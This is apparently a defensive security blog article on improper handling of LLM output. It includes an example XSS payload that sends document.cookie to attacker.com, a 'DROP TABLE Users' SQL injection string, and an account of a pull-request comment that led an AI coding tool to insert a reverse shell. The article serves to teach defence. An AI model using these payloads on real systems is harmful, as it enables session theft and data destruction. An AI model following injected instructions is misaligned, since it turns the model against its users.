January 6, 2026

In the early days of generative AI, we focused almost entirely on the "input" side—trying to stop users from saying the wrong things. By 2026, the industry has realized that the "output" is equally dangerous. If your application takes a response from an LLM and feeds it directly into a browser, a database, or a system shell, you have essentially handed the keys of your kingdom to a non-deterministic black box.



LLM05: Improper Output Handling is a critical vulnerability in the AI Security Framework. It occurs when an application blindly trusts AI-generated content, allowing a simple "chat" to escalate into a full-scale system compromise.

The danger of improper output handling is that it acts as a bridge. An attacker uses Prompt Injection (LLM01) to trick the AI into generating a malicious payload. If the application doesn't sanitize that payload, the attack moves from the "AI layer" to the "application layer."

Imagine an AI assistant that helps users format their notes. An attacker provides a prompt that forces the AI to output:

<script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>

If your frontend renders this output as HTML without sanitization, the attacker has just stolen your user’s session.

In 2026, many AI agents are wired to external tools through "Tool Use" or "Function Calling." If an LLM generates a command to fetch a URL or run a Python script, and your backend executes it without validation, the AI can be manipulated into performing Server-Side Request Forgery (SSRF) or Remote Code Execution (RCE).
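As a rough illustration of validating a tool call before the backend acts on it, the sketch below checks a model-requested URL against an allowlist. The tool-call shape (a dict with `name` and `arguments`), the tool name `fetch_url`, and the host `api.example.com` are all assumptions made for this example, not part of any specific agent framework.

```python
from urllib.parse import urlparse

# Hypothetical allowlists: adjust to the tools and hosts your agent really needs.
ALLOWED_TOOLS = {"fetch_url"}
ALLOWED_HOSTS = {"api.example.com"}


def validate_fetch_request(tool_call: dict) -> str:
    """Return the URL if the LLM-generated tool call is acceptable, else raise."""
    if tool_call.get("name") not in ALLOWED_TOOLS:
        raise ValueError("Tool is not on the allowlist")

    arguments = tool_call.get("arguments")
    url = arguments.get("url") if isinstance(arguments, dict) else None
    if not isinstance(url, str):
        raise ValueError("Tool call is missing a string 'url' argument")

    parsed = urlparse(url)
    # Only HTTPS, so file://, gopher:// and similar schemes are rejected.
    if parsed.scheme != "https":
        raise ValueError("Only https URLs are allowed")
    # Comparing the parsed hostname also rejects raw IP addresses and
    # 'user@host' tricks, because neither matches an allowlisted name.
    if parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError("Host is not on the allowlist")
    return url
```

An allowlist is used here rather than a blocklist of internal addresses because the set of hosts an agent legitimately needs is usually small, while the set of dangerous targets is open-ended.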

Organizations often use LLMs to "translate" natural language into SQL queries. If the model is tricked into appending ; DROP TABLE Users; -- to its output and the application executes it with a privileged database account, the Users table is gone.
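One way to limit the damage from generated SQL is to run it on a connection that can only read. The sketch below uses SQLite's authorizer hook from Python's standard `sqlite3` module; the function names are illustrative, and the semicolon check is a deliberately conservative assumption that will also reject legitimate queries containing a semicolon inside a string literal.

```python
import sqlite3

# Only plain reads are permitted; every other action code is denied.
READ_ONLY_ACTIONS = {sqlite3.SQLITE_SELECT, sqlite3.SQLITE_READ}


def read_only_authorizer(action, arg1, arg2, db_name, source):
    """SQLite calls this while compiling a statement, once per action."""
    if action in READ_ONLY_ACTIONS:
        return sqlite3.SQLITE_OK
    return sqlite3.SQLITE_DENY


def run_generated_query(conn: sqlite3.Connection, sql: str) -> list:
    """Run LLM-generated SQL on a connection guarded by the authorizer."""
    statement = sql.strip().rstrip(";").strip()
    # Conservative check: refuse anything that looks like stacked statements.
    if ";" in statement:
        raise ValueError("Generated SQL must be a single statement")
    # A denied action surfaces as a sqlite3.Error raised by execute().
    return conn.execute(statement).fetchall()
```

To use it, call `conn.set_authorizer(read_only_authorizer)` once on the connection that serves generated queries, after any setup writes are done. In a production database the equivalent control is a dedicated account with read-only grants.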

To secure your application, you must adopt a Zero Trust stance toward LLM outputs. In 2026, "hoping the model behaves" is not a security strategy.

The golden rule of web security is: Never trust user input. In the AI era, this must be updated to: Never trust AI output.

* Context: Any string coming from an LLM should be treated with the same suspicion as a string coming from a random person on the internet.

Don't let the LLM return "free-form" text if you need structured data.
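A minimal sketch of schema enforcement, assuming the model has been asked to reply with a JSON object containing exactly two fields. The field names (`action`, `note_id`) and the permitted actions are hypothetical and stand in for whatever your application expects.

```python
import json
from dataclasses import dataclass

# Hypothetical set of operations the application is willing to perform.
ALLOWED_ACTIONS = {"summarize", "format", "translate"}


@dataclass(frozen=True)
class NoteAction:
    action: str
    note_id: int


def parse_llm_response(raw: str) -> NoteAction:
    """Parse and validate the model's reply; raise ValueError on any deviation."""
    try:
        data = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError("LLM output is not valid JSON") from exc

    # Require exactly the expected keys, so extra fields cannot sneak through.
    if not isinstance(data, dict) or set(data) != {"action", "note_id"}:
        raise ValueError("LLM output does not match the expected fields")

    action, note_id = data["action"], data["note_id"]
    if not isinstance(action, str) or action not in ALLOWED_ACTIONS:
        raise ValueError("Action is not on the allowlist")
    # bool is a subclass of int in Python, so it is excluded explicitly.
    if isinstance(note_id, bool) or not isinstance(note_id, int) or note_id < 0:
        raise ValueError("note_id must be a non-negative integer")

    return NoteAction(action=action, note_id=note_id)
```

Downstream code then works with a `NoteAction` value instead of raw model text, so anything that fails validation never reaches the rest of the application.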

If you must display AI text in a browser, use context-aware encoding.

Convert < to &lt; and > to &gt; so that the browser displays the model's text literally instead of interpreting it as a <script> block.

A strong Content Security Policy (CSP) is your last line of defense. By restricting where scripts can be loaded from and preventing the execution of inline scripts, you can neutralize the impact of an LLM-generated XSS attack even if your sanitization fails.
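The encoding and CSP points can be sketched with Python's standard library. The helper name `render_llm_text` and the exact policy string are assumptions for illustration; a real policy has to be tuned to the assets your page loads, and `html.escape` is only appropriate when the text is placed in an HTML body or a quoted attribute, not inside a script or a URL.

```python
import html

# Illustrative policy: scripts may only come from the site's own origin.
# Omitting 'unsafe-inline' is what blocks injected inline <script> blocks.
CSP_HEADERS = {
    "Content-Security-Policy": (
        "default-src 'self'; script-src 'self'; "
        "object-src 'none'; base-uri 'none'"
    )
}


def render_llm_text(text: str) -> str:
    """Escape LLM output so the browser shows it as text, not markup."""
    # html.escape converts &, <, > and, by default, both quote characters.
    return f"<p>{html.escape(text)}</p>"
```

With this in place, the payload from the note-formatting example is shown to the user as literal text, and the `CSP_HEADERS` dictionary can be attached to every HTML response by whatever web framework is in use.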

| Feature | Traditional Input Validation | Secure AI Output Handling |
| --- | --- | --- |
| Source of Threat | The End User | The LLM (via Prompt Injection) |
| Predictability | High (Expected Formats) | Low (Non-deterministic) |
| Primary Defense | Regex / Type Checking | Sanitization / Schema Enforcement |
| Escalation Risk | Data Corruption | RCE / System Takeover |

In early 2025, a popular "AI Software Engineer" tool was found to be vulnerable to improper output handling. An attacker sent a pull request containing a comment that, when read by the AI, forced it to generate a "fix" that actually included a reverse shell. Because the application executed the AI's "suggested code" in a privileged environment, the attacker gained access to the entire build server.

The Fix: The company implemented a Sandboxed Execution Environment where AI-generated code is run in an isolated container with no network access, and the output is manually reviewed by a human before deployment.
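The kind of isolation described in the fix might look like the following sketch, which only builds a `docker run` command line and does not execute it. The image name, resource limits, and mount path are assumptions chosen for illustration and are not details from the incident itself.

```python
import os


def build_sandbox_command(image: str, script_path: str) -> list[str]:
    """Build a docker command that runs AI-generated code with minimal privileges."""
    host_path = os.path.abspath(script_path)  # bind mounts need an absolute path
    return [
        "docker", "run", "--rm",
        "--network", "none",        # no network access from inside the container
        "--read-only",              # container filesystem is read-only
        "--cap-drop", "ALL",        # drop all Linux capabilities
        "--security-opt", "no-new-privileges",
        "--memory", "256m",         # illustrative resource limits
        "--pids-limit", "64",
        "--volume", f"{host_path}:/sandbox/generated.py:ro",
        image,
        "python", "/sandbox/generated.py",
    ]
```

A caller could pass the resulting list to `subprocess.run(..., timeout=...)` and hold the container's output for human review. Passing the arguments as a list rather than a shell string avoids introducing a second injection point in the sandbox launcher itself.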

In the AI Security Framework, your application code is the final gatekeeper. The LLM might be "smart," but it doesn't understand security contexts. It is the developer's job to ensure that the AI's words never become an attacker's commands.

Proper output handling is your shield against the unpredictable. Once you’ve secured the bridge between the AI and your system, the next step is to look at the power you give your AI—the risk of "Excessive Agency."